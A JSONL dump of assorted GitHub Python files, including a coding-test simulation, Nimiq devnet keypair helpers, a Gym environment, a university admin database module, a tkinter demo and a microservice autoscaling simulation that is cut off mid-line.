+{"seq_id":"42089268802","text":"from copy import deepcopy\n\ndef grow():\n new_graph = [[0] * n for _ in range(n)]\n\n for x in range(n):\n for y in range(n):\n if graph[x][y] >= 1:\n\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n\n if 0 <= nx < n and 0 <= ny < n:\n if graph[nx][ny] >= 1:\n new_graph[nx][ny] += 1\n\n for x in range(n):\n for y in range(n):\n graph[x][y] += new_graph[x][y]\n\ndef spread():\n new_graph = deepcopy(graph)\n\n for x in range(n):\n for y in range(n):\n if graph[x][y] >= 1:\n\n tree_amount = graph[x][y]\n cnt = 0\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n\n if 0 <= nx < n and 0 <= ny < n:\n if graph[nx][ny] == 0 and kill_tree[nx][ny] == 0:\n cnt += 1\n\n if cnt != 0:\n spread_amount = tree_amount // cnt\n\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n\n if 0 <= nx < n and 0 <= ny < n:\n if graph[nx][ny] == 0 and kill_tree[nx][ny] == 0:\n new_graph[nx][ny] += spread_amount\n\n return new_graph\n\n\nd_dx = [1, 1, -1, -1]\nd_dy = [1, -1, 1, -1]\ndef most_tree_kill(x, y):\n global pre_x, pre_y, kill_amount\n\n value = graph[x][y]\n\n for i in range(4):\n cur_x, cur_y = x, y\n for _ in range(k):\n nx = cur_x + d_dx[i]\n ny = cur_y + d_dy[i]\n\n if not (0 <= nx < n and 0 <= ny < n):\n break\n\n if graph[nx][ny] <= 0:\n break\n\n if graph[nx][ny] >= 1:\n value += graph[nx][ny]\n cur_x, cur_y = nx, ny\n\n if kill_amount < value:\n pre_x, pre_y = x, y\n kill_amount = value\n\ndef kill_tree_time():\n for i in range(n):\n for j in range(n):\n if kill_tree[i][j] > 0:\n kill_tree[i][j] -= 1\n\n\ndef tree_kill(x, y):\n kill_tree[x][y] = c\n graph[x][y] = 0\n\n for i in range(4):\n cur_x, cur_y = x, y\n for _ in range(k):\n nx = cur_x + d_dx[i]\n ny = cur_y + d_dy[i]\n\n if not (0 <= nx < n and 0 <= ny < n):\n break\n\n if graph[nx][ny] <= 0:\n kill_tree[nx][ny] = c\n break\n\n if graph[nx][ny] >= 1:\n kill_tree[nx][ny] = c\n graph[nx][ny] = 0\n cur_x, cur_y = nx, ny\n\n# n=격자의 크기, m=박멸이 진행되는 년 수, k=제초제의 확산 범위, c=제초제가 남아있는 년 수\nn, m, k, c = map(int, input().split())\ngraph = [list(map(int, input().split())) for _ in range(n)]\n# 제초제가 남아있는 년 수 저장 배열\nkill_tree = [[0] * n for _ in range(n)]\n\ndx = [-1, 0, 1, 0]\ndy = [0, 1, 0, -1]\n\n# 출력 조건, m년 동안 박멸한 나무의 총 그루 수\nanswer = 0\nfor _ in range(m):\n # 1. 나무의 성장\n grow()\n\n # 2. 나무의 번식\n graph = spread()\n\n # 3. 제초제 뿌릴 구역 정하기\n pre_x, pre_y = 0, 0\n kill_amount = 0\n for i in range(n):\n for j in range(n):\n if graph[i][j] >= 1:\n most_tree_kill(i, j)\n\n # 4. 제초제 시간을 줄여준다\n kill_tree_time()\n\n # 5. 제초제를 살포한다\n tree_kill(pre_x, pre_y)\n\n answer += kill_amount\n\nprint(answer)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/코테재활/삼성 역테 재활/solution65.py","file_name":"solution65.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"9293598499","text":"import subprocess\nfrom topology_settings import TopologySettings\n\n\ndef __nimiq_schnorr(topology_settings: TopologySettings):\n command = [\"cargo\", \"run\"]\n if topology_settings.get_release():\n command.append(\"--release\")\n command.extend([\"--bin\", \"nimiq-address\"])\n output = subprocess.check_output(\n command, text=True, cwd=topology_settings.get_nimiq_dir(),\n stderr=subprocess.DEVNULL)\n return output.splitlines()\n\n\ndef __nimiq_bls(topology_settings: TopologySettings):\n command = [\"cargo\", \"run\"]\n if topology_settings.get_release():\n command.append(\"--release\")\n command.extend([\"--bin\", \"nimiq-bls\"])\n output = subprocess.check_output(\n command, text=True, cwd=topology_settings.get_nimiq_dir(),\n stderr=subprocess.DEVNULL)\n return output.splitlines()\n\n\ndef create_bls_keypair(topology_settings: TopologySettings):\n lines = []\n for line in __nimiq_bls(topology_settings):\n line = line.strip()\n if line and not line.startswith(\"#\"):\n lines.append(line)\n return {\n \"public_key\": lines[0],\n \"private_key\": lines[1]\n }\n\n\ndef create_schnorr_keypair(topology_settings: TopologySettings):\n lines = []\n for i, l in enumerate(__nimiq_schnorr(topology_settings)):\n lines.append(l.split(\":\")[1].strip())\n return {\n \"address\": lines[0],\n \"address_raw\": lines[1],\n \"public_key\": lines[2],\n \"private_key\": lines[3]\n }\n","repo_name":"nimiq/core-rs-albatross","sub_path":"scripts/devnet/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"37"} +{"seq_id":"22984420675","text":"# Leonardo L. Alonso Carriço\n# leonardo@carrico.com.br\n\n# Exercício Prático Python [24/09] 02\n\n###################################################################\n# 2) Faça um Programa que leia três números inteiros e mostre o maior deles.\n\nnum1 = int(input(\"\\nEntre com o primeiro número inteiro : \"))\nnum2 = int(input(\"\\nEntre com o segundo número inteiro : \"))\nnum3 = int(input(\"\\nEntre com o terceiro número inteiro : \"))\n\nif num1 > num2 and num1 > num3 :\n print(f\"\\n{num1} É o maior número\\n\")\n\nelif num2 > num1 and num2 > num3 :\n print(f\"\\n{num2} É o maior número\\n\")\n\nelif num3 > num1 and num3 > num2 :\n print(f\"\\n{num3} É o maior número\\n\")","repo_name":"oleoalonso/atvPython-24-09","sub_path":"exerPython-24-09-02.py","file_name":"exerPython-24-09-02.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71291421227","text":"import numpy as np\nimport gym\nfrom gym import spaces\nimport random\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\nGRAPHING = True\n\nif GRAPHING:\n\tplt.ion()\n\tfig = plt.figure()\n\n\tdataWin = []\n\tdata10Win = []\n\tdataRew = []\n\tdata10Rew = []\n\n\tavgPer = 10\n\n\tdef update(w, r):\n\t\tdataWin.append(w)\n\t\tdataRew.append(r)\n\n\t\tif len(dataWin) % avgPer == 0:\n\t\t\tdata10Win.append(sum(dataWin[-avgPer:]) / avgPer)\n\t\t\tdata10Rew.append(sum(dataRew[-avgPer:]) / avgPer)\n\n\t\tfig.clf()\n\t\tplt.subplot(2, 1, 1)\n\t\tplt.plot(np.arange(len(data10Win)) * avgPer, data10Win)\n\t\tplt.ylabel(\"win percent\")\n\n\t\tplt.subplot(2, 1, 2)\n\t\tplt.plot(np.arange(len(data10Rew)) * avgPer, data10Rew)\n\t\tplt.ylabel(\"avg reward\")\n\nclass BotGym(gym.Env):\n\t_seed = 42\n\tviewer = None\n\n\tavgReward = 0\n\n\tdef __init__(self):\n\t\tself.max = 300\n\t\tself.speed = 2.0\n\n\t\tself.action_num = 2\n\t\tself.observation_num = 3\n\n\t\tself.avgReward = 0\n\n\t\tself.action_space = spaces.Box(low=-self.max, high=self.max, shape=(self.action_num, ), dtype=np.float32)\n\t\tself.observation_space = spaces.Box(low=-self.max, high=self.max, shape=(self.observation_num, ) , dtype=np.float32)\n\n\tdef step(self, action):\n\t\ta0 = action[0] * self.speed / self.max\n\t\ta1 = action[1] * self.speed / self.max\n\n\t\tself.x += a0 * math.sin(math.radians(self.angle))\n\t\tself.y += a0 * math.cos(math.radians(self.angle))\n\n\t\tself.angle += a1\n\n\t\tdistX = abs(self.x - self.target_x)\n\t\tdistY = abs(self.y - self.target_y)\n\n\t\t#a1 = math.radians(90 - self.angle)\n\t\t#a2 = math.atan2(self.target_y - self.y, self.target_x - self.x)\n\t\t#a = math.atan2(math.sin(a1-a2), math.cos(a1-a2))\n\t\t#reward = -(a ** 2) * 10#-(distX ** 2 + distY ** 2) / 2500\n\n\t\treward = -(distX ** 2 + distY ** 2) / 5000\n\n\t\tdone = distX < 10 and distY < 10\n\t\tif done:\n\t\t\treward = 10\n\t\t\tself.win = 1.0\n\n\t\tself.avgReward += reward\n\t\treturn self.get_info(), reward, done, {}\n\n\tdef reset(self):\n\t\tself.x = random.randint(10,490)\n\t\tself.y = random.randint(10,490)\n\t\tself.angle = 0#45\n\n\t\tself.target_x = 250\n\t\tself.target_y = 250\n\n\t\tif GRAPHING and self.viewer:\n\t\t\tupdate(self.win, self.avgReward / 200.0)\n\n\t\tself.avgReward = 0\n\t\tself.win = 0\n\n\t\treturn self.get_info()\n\n\tdef render(self, mode='human', close=False):\n\t\tif self.viewer is None:\n\t\t\tfrom gym.envs.classic_control import rendering\n\n\t\t\tself.viewer = rendering.Viewer(500,500)\n\n\t\t\ttarget = rendering.make_circle(10)\n\t\t\tself.target_transform = rendering.Transform()\n\t\t\ttarget.add_attr(self.target_transform)\n\t\t\ttarget.set_color(0,255,0)\n\t\t\tself.viewer.add_geom(target)\n\n\t\t\tbot = rendering.make_capsule(10,20)\n\t\t\tself.bot_transform = rendering.Transform()\n\t\t\tbot.add_attr(self.bot_transform)\n\t\t\tbot.set_color(0,0,255)\n\t\t\tself.viewer.add_geom(bot)\n\n\t\tself.target_transform.set_translation(self.target_x, self.target_y)\n\t\tself.bot_transform.set_rotation(math.radians(90 - self.angle))\n\t\tself.bot_transform.set_translation(self.x, self.y)\n\n\t\treturn self.viewer.render(return_rgb_array = mode=='rgb_array')\n\n\tdef get_info(self):\n\t\tx = max(min(self.target_x - self.x, self.max), -self.max)\n\t\ty = max(min(self.target_y - self.y, self.max), -self.max)\n\n\t\tangle_sin = math.sin( math.radians(self.angle) ) * self.max\n\t\tangle_cos = math.cos( math.radians(self.angle) ) * self.max\n\n\t\ta1 = math.radians(90 - self.angle)\n\t\ta2 = math.atan2(self.target_y - self.y, self.target_x - self.x)\n\n\t\tangle_offset = math.atan2(math.sin(a1-a2), math.cos(a1-a2)) / math.pi * self.max\n\n\t\treturn np.array([x, y, angle_offset])\n","repo_name":"FelixMo42/artiBlue","sub_path":"environments/envs/bot_gym.py","file_name":"bot_gym.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"34738868106","text":"import hashlib\n\nfrom docenti import *\nfrom studenti import *\nfrom classi import *\n\n\"\"\"\nla funzione add_degree_course_aux riceve come parametro il codice del corso di laurea, il nome del corso di laurea, \nla specializzazione e l'indirizzo e aggiunge il corso di laurea attraverso la INSERT\n@param cod_corso: codice del corso di laurea\n@param nome_corso: nome del corso di laurea\n@param spec: specializzazione del corso di laurea\n@param indirizzo: indirizzo del corso di laurea\n@param mysql: connessione al database\n\"\"\"\n\n\ndef add_degree_course_aux(cod_corso, nome_corso, spec, indirizzo):\n corso_laurea = Corsi_di_Laurea(\n CodCorsoLaurea=cod_corso,\n NomeCorsoLaurea=nome_corso,\n Specializzazione=spec,\n indirizzo=indirizzo,\n )\n db.session.add(corso_laurea)\n db.session.commit()\n\n\n\"\"\"\nla funzione get_degree_course riceve come parametro la connessione al database e restituisce tutti i corsi di laurea\nattraverso un ciclo for che scorre tutte le righe della tabella\n@param mysql: connessione al database\n@return corsi: lista dei corsi di laurea\n\"\"\"\n\n\ndef get_degree_course():\n corsi = []\n rows = Corsi_di_Laurea.query.all()\n if rows:\n for row in rows:\n codice = row.CodCorsoLaurea\n nome = row.NomeCorsoLaurea\n specializzazione = row.Specializzazione\n indirizzo = row.indirizzo\n corso_info = {\n \"codice\": codice,\n \"nome\": nome,\n \"specializzazione\": specializzazione,\n \"indirizzo\": indirizzo,\n }\n corsi.append(corso_info)\n\n return corsi\n\n\n\"\"\"\nla funzione delete_degree_course_aux_post riceve come parametro il codice del corso di laurea da eliminare\ne lo elimina attraverso la DELETE\n@param codice_corso: codice del corso di laurea da eliminare\n@param mysql: connessione al database\nvedere delete_corso_corsoLaurea_aux_post per ulteriori dettagli\n\"\"\"\n\n\ndef delete_degree_course_aux_post(codice_corso):\n delete_corso_corsoLaurea_aux_post(codice_corso, None)\n Corsi_di_Laurea.query.filter_by(CodCorsoLaurea=codice_corso).delete()\n db.session.commit()\n\n\n\"\"\"\nla funzione add_course_aux riceve come parametro il codice del corso, il nome del corso e aggiunge il corso attraverso la INSERT\n@param codice: codice del corso\n@param nome: nome del corso\n@param mysql: connessione al database\n\"\"\"\n\n\ndef add_course_aux(codice, nome, valore):\n corso = Corsi(CodiceCorso=codice, NomeCorso=nome, Valore=valore)\n db.session.add(corso)\n db.session.commit()\n\n\n\"\"\"\nla funzione delete_course_aux_post riceve come parametro il codice del corso da eliminare\ne lo elimina attraverso la DELETE\n@param codice_corso: codice del corso da eliminare\n@param mysql: connessione al database\nvedere delete_corso_corsoLaurea_aux_post per ulteriori dettagli\n\"\"\"\n\n\ndef delete_course_aux_post(codice_corso):\n delete_corso_corsoLaurea_aux_post(None, codice_corso)\n Corsi.query.filter_by(CodiceCorso=codice_corso).delete()\n db.session.commit()\n\n\n\"\"\"\nla funzione get_course riceve come parametro la connessione al database e restituisce tutti i corsi\nattraverso un ciclo for che scorre tutte le righe della tabella\n@param mysql: connessione al database\n@return corsi: lista dei corsi\n\"\"\"\n\n\ndef get_course():\n corsi = []\n rows = Corsi.query.all()\n if rows:\n for row in rows:\n corso_info = {\n \"codice\": row.CodiceCorso,\n \"nome\": row.NomeCorso,\n }\n corsi.append(corso_info)\n\n return corsi\n\n\n\"\"\"\nla funzione add_corso_corsoLaurea_aux riceve come parametro il codice del corso di laurea, il codice del corso e l'anno di insegnamento\ne aggiunge il corso attraverso la INSERT\n@param corso_laurea: codice del corso di laurea\n@param corso: codice del corso\n@param anno: anno di insegnamento\n@param mysql: connessione al database\n\n\"\"\"\n\n\ndef assegnaCorsoCorsoLaurea_aux(corso_laurea, corso, anno):\n appart = Appartenenti(CorsoLaurea=corso_laurea, CodCorso=corso, Anno=anno)\n db.session.add(appart)\n db.session.commit()\n\n\n\"\"\"\nla funzione add_docente_aux riceve come parametro i dati del docente contenuti in doc e aggiunge il docente attraverso la INSERT\n@param doc: dati del docente\n@param mysql: connessione al database\nsi controlla che il codice fiscale non sia già presente tra gli studenti\n\n\"\"\"\n\n\ndef add_docente_aux(doc):\n pwd = doc[\"password\"]\n hash_password = hashlib.sha256(pwd.encode(\"utf-8\"))\n hash_value = hash_password.hexdigest()\n\n codicefiscale = doc[\"codice_fiscale\"]\n\n if is_cf_present_in_studenti(codicefiscale):\n raise ValueError(\"Codice fiscale già presente tra gli studenti\")\n\n docente = Docenti(\n CodiceFiscale=doc[\"codice_fiscale\"],\n Nome=doc[\"nome\"],\n Cognome=doc[\"cognome\"],\n mail=doc[\"mail\"],\n annoNascita=doc[\"anno_nascita\"],\n password=hash_value,\n )\n\n db.session.add(docente)\n db.session.commit()\n\n\n\"\"\"\nla funzione delete_docenti_aux riceve come parametro il codice fiscale del docente da eliminare\ne lo elimina attraverso la DELETE\n@param codice_fiscale: codice fiscale del docente da eliminare\n@param mysql: connessione al database\n\n\"\"\"\n\n\ndef delete_docenti_aux(codice_fiscale):\n Docenti.query.filter_by(CodiceFiscale=codice_fiscale).delete()\n db.session.commit()\n\n\n\"\"\"\nla funzione get_docenti riceve come parametro la connessione al database e restituisce tutti i docenti \nattraverso un ciclo for che scorre tutte le righe della tabella\n@param mysql: connessione al database\n@return docenti: lista dei docenti\n\n\"\"\"\n\n\ndef get_docenti():\n docenti = []\n rows = Docenti.query.with_entities(\n Docenti.CodiceFiscale,\n Docenti.Nome,\n Docenti.Cognome,\n Docenti.mail,\n Docenti.annoNascita,\n )\n if rows:\n for row in rows:\n doc_info = {\n \"codice_fiscale\": row.CodiceFiscale,\n \"nome\": row.Nome,\n \"cognome\": row.Cognome,\n \"mail\": row.mail,\n \"anno_di_nascita\": row.annoNascita,\n }\n docenti.append(doc_info)\n return docenti\n\n\ndef is_valid_mail(matricola, mail):\n valid_mail = matricola + \"@stud.unive.it\"\n return mail == valid_mail\n\n\n\"\"\"\nla funzione get_course_degree_course riceve come parametro la connessione al database e restituisce tutti i corsi di laurea e i corsi\nattraverso un ciclo for che scorre tutte le righe della tabella\n@param mysql: connessione al database\n@return dettagli: lista dei corsi di laurea e dei corsi\n\n\"\"\"\n\n\ndef get_course_degree_course():\n dettagli = []\n rows = Appartenenti.query.all()\n if rows:\n for row in rows:\n info = {\n \"CorsoLaurea\": row.CorsoLaurea,\n \"CodCorso\": row.CodCorso,\n }\n dettagli.append(info)\n return dettagli\n\n\n\"\"\"\nla funzione delete_corso_corsoLaurea_aux_post riceve come parametro il codice del corso di laurea e il codice del corso\ne li elimina attraverso la DELETE\n@param deg_course: codice del corso di laurea\n@param course: codice del corso\n@param mysql: connessione al database\n\n\"\"\"\n\n\ndef delete_corso_corsoLaurea_aux_post(deg_course, course):\n Appartenenti.query.filter_by(CorsoLaurea=deg_course, CodCorso=course).delete()\n db.session.commit()\n\n\n\"\"\"\nla funzione assegna_Corso_Docente_aux riceve come parametro il codice fiscale del docente e il codice del corso\ne li aggiunge attraverso la INSERT\n@param docente: codice fiscale del docente\n@param corso: codice del corso\n@param mysql: connessione al database\n\n\"\"\"\n\n\ndef assegna_Corso_Docente_aux(docente, corso):\n doc_ins = Insegna(CodCorso=corso, CodFiscale=docente)\n db.session.add(doc_ins)\n db.session.commit()\n\n\n\"\"\"\nla funzione get_temporaryuser riceve come parametro la connessione al database e restituisce tutti gli studenti\nattraverso un ciclo for che scorre tutte le righe della tabella\n@param mysql: connessione al database\n@return user: lista degli studenti\n\n\"\"\"\n\n\ndef get_temporaryuser():\n users = []\n rows = TemporaryUser.query.all()\n\n # Retrieve the results\n\n if rows:\n for row in rows:\n info = {\n \"codiceFiscale\": row.CodiceFiscale,\n \"nome\": row.Nome,\n \"cognome\": row.Cognome,\n \"mail\": row.mail,\n \"annoNascita\": row.annoNascita,\n \"matricola\": row.matricola,\n \"password\": row.password,\n \"CorsoLaurea\": row.CorsoLaurea,\n }\n users.append(info)\n return users\n\n\n\"\"\"\nla funzione delete_tempuser riceve come parametro il codice fiscale dello studente da eliminare\ne lo elimina attraverso la DELETE\n@param cf: codice fiscale dello studente da eliminare\n@param mysql: connessione al database\n\n\"\"\"\n\n\ndef delete_tempuser(cf):\n TemporaryUser.query.filter_by(CodiceFiscale=cf).delete()\n db.session.commit()\n\n\n\"\"\"\nla funzione add_user riceve come parametro lo studente da aggiungere e lo aggiunge attraverso la INSERT\n@param stud: studente da aggiungere\n@param mysql: connessione al database\nvengono fatti dei controlli sulla matricola, sulla mail e sul codice fiscale\nse i controlli sono corretti viene eseguita la INSERT\n\n\"\"\"\n\n\ndef add_user(stud):\n studente = Studenti(\n CodiceFiscale=stud[\"codice_fiscale\"],\n Nome=stud[\"nome\"],\n Cognome=stud[\"cognome\"],\n annoNascita=stud[\"annoNascita\"],\n mail=stud[\"mail\"],\n matricola=stud[\"matricola\"],\n password=stud[\"password\"],\n CorsoLaurea=stud[\"corso_laurea\"],\n )\n db.session.add(studente)\n db.session.commit()\n\n\n\"\"\"\nla funzione get_studenti riceve come parametro la connessione al database e restituisce tutti gli studenti\nattraverso un ciclo for che scorre tutte le righe della tabella\n@param mysql: connessione al database\n@return users: lista degli studenti\n\n\"\"\"\n\n\ndef get_studenti():\n users = []\n rows = Studenti.query.all()\n if rows:\n for row in rows:\n info = {\n \"codiceFiscale\": row.CodiceFiscale,\n \"nome\": row.Nome,\n \"cognome\": row.Cognome,\n \"mail\": row.mail,\n \"annoNascita\": row.annoNascita,\n \"matricola\": row.matricola,\n \"password\": row.password,\n \"CorsoLaurea\": row.CorsoLaurea,\n }\n users.append(info)\n return users\n\n\n\"\"\"\nla funzione delete_aux riceve come parametro il codice fiscale dello studente da eliminare \ne lo elimina attraverso la DELETE\n@param cf: codice fiscale dello studente da eliminare\n@param mysql: connessione al database\n\n\"\"\"\n\n\ndef delete_aux(cf):\n Studenti.query.filter_by(CodiceFiscale=cf).delete()\n db.session.commit()\n\n\n\"\"\"\nla funzione get_course_docenti riceve come parametro la connessione al database e restituisce tutti i corsi e i docenti\nche insegnano quel corso attraverso un ciclo for che scorre tutte le righe della tabella\n@param mysql: connessione al database\n@return data: lista dei corsi e dei docenti\n\n\"\"\"\n\n\ndef get_course_docenti():\n data = []\n rows = Insegna.query.all()\n if rows:\n for row in rows:\n info = {\"Corso\": row.CodCorso, \"Docente\": row.CodFiscale}\n data.append(info)\n return data\n\n\n\"\"\"\nla funzione delete_corso_Docente_aux riceve come parametro il codice fiscale del docente e il codice del corso da eliminare\ne li elimina attraverso la DELETE\n@param doc_cf: codice fiscale del docente\n@param code_course: codice del corso da eliminare\n@param mysql: connessione al database\n\n\"\"\"\n\n\ndef delete_corso_Docente_aux(doc_cf, code_course):\n Insegna.query.filter_by(CodCorso=code_course, CodFiscale=doc_cf).delete()\n db.session.commit()\n","repo_name":"JayRen432/Progetto-BD","sub_path":"administrator.py","file_name":"administrator.py","file_ext":"py","file_size_in_byte":11739,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22740585699","text":"from scan_2D import plot_everything_from_TCT_2D_scan\nfrom the_bureaucrat.bureaucrats import RunBureaucrat # https://github.com/SengerM/the_bureaucrat\nfrom pathlib import Path\nimport logging\n\nif __name__ == '__main__':\n\timport argparse\n\tfrom plotly_utils import set_my_template_as_default\n\timport sys\n\t\n\tlogging.basicConfig(\n\t\tstream = sys.stderr, \n\t\tlevel = logging.INFO,\n\t\tformat = '%(asctime)s|%(levelname)s|%(funcName)s|%(message)s',\n\t\tdatefmt = '%Y-%m-%d %H:%M:%S',\n\t)\n\t\n\tset_my_template_as_default()\n\t\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--dir',\n\t\tmetavar = 'path', \n\t\thelp = 'Path to the base measurement directory.',\n\t\trequired = True,\n\t\tdest = 'directory',\n\t\ttype = str,\n\t)\n\t\n\targs = parser.parse_args()\n\t\n\tbureaucrat = RunBureaucrat(Path(args.directory))\n\tplot_everything_from_TCT_2D_scan(bureaucrat)\n","repo_name":"SengerM/tct_setup","sub_path":"plot_2D_scan.py","file_name":"plot_2D_scan.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33864502344","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 6 01:40:24 2020\r\n\r\n@author: 1buraknegis\r\n\"\"\"\r\n\r\n\r\nimport tkinter as tk\r\nimport random as rd\r\n\r\nform = tk.Tk()\r\nform.title(\"Tekrar Uygulaması\")\r\nform.geometry(\"500x400+500+350\")\r\n\r\nliste = []\r\nfor i in range(5):\r\n while len(liste) != 6:\r\n a = rd.randint(1,50)\r\n if a not in liste:\r\n liste.append(a)\r\n\r\ndef goster():\r\n label.config(text = liste, bg = \"green\")\r\n \r\n\r\ndef saydamlastir():\r\n form.wm_attributes(\"-alpha\", 0.3)\r\n \r\ndef dondur():\r\n form.wm_attributes(\"-alpha\", 0.9)\r\n\r\ndef max_yap():\r\n form.state(\"zoomed\")\r\n \r\ndef min_yap():\r\n form.state(\"iconic\")\r\n \r\nlabel = tk.Label(form, fg =\"red\", bg = \"red\", font = \"Times 20 bold\")\r\nlabel.pack()\r\n\r\ngoster = tk.Button(form, text = \"göster\", fg = \"black\", bg =\"yellow\", command = goster)\r\ngoster.pack(side = tk.LEFT)\r\n\r\ngoster = tk.Button(form, text = \"saydamlaştır\", fg = \"black\", bg =\"yellow\", command = saydamlastir)\r\ngoster.pack(side = tk.LEFT)\r\n\r\ngoster = tk.Button(form, text = \"döndür\", fg = \"black\", bg =\"yellow\", command = dondur)\r\ngoster.pack(side = tk.LEFT)\r\n\r\ngoster = tk.Button(form, text = \"max yap\", fg = \"black\", bg =\"yellow\", command = max_yap)\r\ngoster.pack(side = tk.LEFT)\r\n\r\ngoster = tk.Button(form, text = \"min yap\", fg = \"black\", bg =\"yellow\", command = min_yap)\r\ngoster.pack(side = tk.LEFT)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nform.mainloop()","repo_name":"1buraknegis/Python-Tkinter-examples","sub_path":"tkinter_ornek1.py","file_name":"tkinter_ornek1.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69937962029","text":"import copy\n\n\nimport networkx as nx\n\nfrom applications.hotelreservationservice import*\nfrom applications.sockshopmicroservice import *\nfrom dag import DAG\nfrom generators import *\nfrom controllers import *\nfrom monitoring import Monitoring\nfrom node import Node\nfrom simulationdependences import SimulationWithDependeciesDAG\n\nclass MainHotelDependency:\n def __init__(self, filename='', dag=None):\n self.filename = filename\n self.dag = dag\n\n def run(self, filename=''):\n stime = 0.274\n appSLA = stime\n horizon = 1200\n alfa=0.5\n monitoringWindow = 1\n initCores = 2.5\n period = 1\n search_sla = appSLA\n profile_sla = 0.095\n geo_sla = 0.068\n rate_sla = 0.079\n\n total_weight = 0.00506\n slas=[appSLA, profile_sla,geo_sla ,rate_sla]\n\n\n apps = [Search(appSLA, init_cores=initCores), Profile(appSLA, init_cores=initCores), Geo(appSLA, init_cores=initCores),\n Rate(appSLA, init_cores=initCores)]\n appNames = ['Sch', 'Prf', 'Geo', 'Rat']\n\n mns = [Monitoring(monitoringWindow, appSLA, local_sla=search_sla),\n Monitoring(monitoringWindow, appSLA, local_sla=profile_sla),\n Monitoring(monitoringWindow, appSLA, local_sla=geo_sla),\n Monitoring(monitoringWindow, appSLA, local_sla=rate_sla)]\n\n sts=[]\n i = 0\n for app in apps:\n st = alfa * app.weight / total_weight\n localSLA = slas[i] if slas[i] > 0.0 else app.weight* 2\n if localSLA*3/4 < st*appSLA or localSLA/2 > st*appSLA:\n sts.append(0.5 * localSLA / appSLA)\n else:\n sts.append(st)\n i = i+1\n\n g=[]\n\n for i in range(0,4):\n g.append(ZeroGen())\n g[i - 1].setName(\"ZG -\" + str(appNames[i]))\n\n times = []\n req = [114,20,63,57,72,45,35,36,37,105,102,105,41,47,118,101,58,120,101,34,33,93,112,117]\n for i in range(1,25):\n times.append(i*50)\n req[i-1] = req[i-1] *40#*40 bottleneck\n\n\n c0 = CTControllerScaleDependency(period, initCores, BC=0.001, DC=0.02, max_cores=apps[0].max_cores, st=sts[0]); c0.setName(\"ScaleX\")\n c1 = CTControllerScaleDependency(period, initCores, BC=0.0001, DC=0.002, max_cores=apps[1].max_cores, st=sts[1]); c1.setName(\"ScaleX\")\n c2 = CTControllerScaleDependency(period, initCores, BC=0.0001, DC=0.002, max_cores=apps[2].max_cores, st=sts[2]); c2.setName(\"ScaleX\")\n c3 = CTControllerScaleDependency(period, initCores, BC=0.0001, DC=0.002, max_cores=apps[3].max_cores, st=sts[3]); c3.setName(\"ScaleX\")\n\n\n\n c0.setSLA(apps[0].sla); c1.setSLA(apps[1].sla); c2.setSLA(apps[2].sla); c3.setSLA(apps[3].sla)\n\n c0.setMonitoring(mns[0]); c1.setMonitoring(mns[1]); c2.setMonitoring(mns[2]); c3.setMonitoring(mns[3])\n\n\n g[0] = RampGen(1, 90, 10); g[0].setName(\"RP - Search\")\n\n #g[1] = RampGen(1, 90, 10); g[1].setName(\"RP - Prof\")\n g[1] = StepGen(times, req); g[1].setName(\"STP - Prof\")\n\n c0.setGenerator(g[0]); c1.setGenerator(g[1]); c2.setGenerator(g[2]); c3.setGenerator(g[3])\n\n dg = nx.DiGraph([('Sch', \"Prf\"), (\"Sch\", \"Geo\"), (\"Sch\", \"Rat\")])\n\n dag_model = DAG(dg, 'Sch')\n dg_dep = dag_model.dag\n sync = 1\n\n for edge in dg_dep.edges:\n dg_dep.edges[edge]['times'] = 1\n dg_dep.edges[edge]['sync'] = sync\n dg_dep.edges[(\"Sch\", \"Prf\")]['sync'] = 2\n dg_dep.edges[(\"Sch\", \"Rat\")]['sync'] = 3\n\n\n dg_dep.nodes['Sch']['node'] = Node(horizon, c0, apps[0], monitoring=mns[0], name='Sch', generator=g[0], local_sla=search_sla) # local sla set by user\n dg_dep.nodes['Prf']['node'] = Node(horizon, c1, apps[1], monitoring=mns[1], name='Prf', generator=g[1], local_sla=profile_sla)\n dg_dep.nodes['Geo']['node'] = Node(horizon, c2, apps[2], monitoring=mns[2], name='Geo', generator=g[2], local_sla=geo_sla)\n dg_dep.nodes['Rat']['node'] = Node(horizon, c3, apps[3], monitoring=mns[3], name='Rat', generator=g[3], local_sla=rate_sla)\n\n for node in dg_dep:\n dg_dep.nodes[node]['users'] = 0\n dg_dep.nodes[node]['node'].total_weight = total_weight # given by user\n dg_dep.nodes[node]['node'].subtotal_weight = dg.nodes[node]['node'].app.weight\n\n simul = SimulationWithDependeciesDAG(horizon, dag_model, 'Sch')\n\n simul.run()\n\n simul.plot()\n simul.plot(isTotalRT=False)\n # MAP VISUALIZATION\n dag_model.updateForVisualization('Sch')\n\n dag_model.print_dag('users', show_sync=True, show_times=True,label='hotel_dependency-normal')\n dag_model.print_dag('rt', show_sync=True, show_times=True,label='hotel_dependency-normal')\n dag_model.print_dag('st', show_sync=True, show_times=True,label='hotel_dependency-normal')\n dag_model.print_dag('lrt', show_sync=True, show_times=True,label='hotel_dependency-normal')\n dag_model.print_dag('app', show_sync=True, show_times=True,label='hotel_dependency-normal')\n dag_model.print_dag('cores', show_sync=True, show_times=True,label='hotel_dependency-normal')\n dag_model.print_dag('cores_deviation', show_sync=True, 